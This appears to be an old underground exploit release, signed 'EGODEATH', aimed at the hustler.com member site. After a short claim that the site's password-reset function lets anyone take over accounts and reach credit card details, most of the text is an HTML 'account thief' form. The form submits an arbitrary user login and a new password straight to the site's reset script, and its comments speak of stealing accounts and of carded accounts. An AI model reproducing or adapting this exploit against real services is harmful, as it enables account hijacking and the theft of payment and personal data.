Security vulnerability in the customer web interface at hustler.com allows malicious attacker to hijack any user accounts, and gain access to credit card and personal information. HTML exploit template included. 1.730 kb.
add2370cf21bee06621bdf7e4288deba5511fa40a7eff9ed51c8e2ddcfbbfa8b
security vulnerability in hustler.com which allows any user to
steal another users account and gain access to full access to
their account including cc# information
no fix yet. hustler.com has been informed.
----------------------------------------------------------------------------
exploit template
----------------------------------------------------------------------------
<!-- E G 0 D 3 A T H -->
<HTML>
<HEAD><TITLE>HUSTLER LOGIN THEIF BY EGODEATH</TITLE></HEAD>
<BODY bgcolor=#000000 text=#FFFFFF>
<table border="0">
<th><font colo<b><u>HACKED</b></u>
</table>
<H2>Change My Password - ego's M0D1Fi3D verzi0n</H2>
<FORM METHOD="POST" ACTION="https://members.flyntdigital.com/secure-bin/usr_search_admin/resetpass.pl">
<TABLE BORDER=1 CELLSPACING=0 CELLPADDING=4 WIDTH=500>
<TR>
<TH VALIGN=TOP WIDTH=40% ALIGN=RIGHT>Highlight the User ID: </TH>
<TD>
<font color=red>This is the hustler account thief script<br>in order for this to work you must know<br>somones real login name ( if its an old carded<br> account with a nick like XTC, give up<br> you cant steal a froozen account, but<br> yea.. u can change its password...</font>
<input type="text" NAME="usr_login" value="a real login name">
</TD>
</TR>
<TR>
<TD align=left>Enter Your New Password</TD>
<TD align=right>Enter Password again</TD>
</TR>
<TR>
<TD ALIGN=left>
<INPUT TYPE="text" NAME="pass_wd1" VALUE="">
</TD>
<TD align=right>
<INPUT TYPE="text" NAME="pass_wd2" VALUE="">
</TD>
</TR>
<TR>
<TD COLSPAN=2 ALIGN=CENTER>
<INPUT TYPE="submit" NAME="submit" VALUE="Submit">
<INPUT TYPE="reset" NAME="reset" VALUE="Reset">
</TD>
</TR>
</TABLE>
</FORM>
</BODY>
</HTML>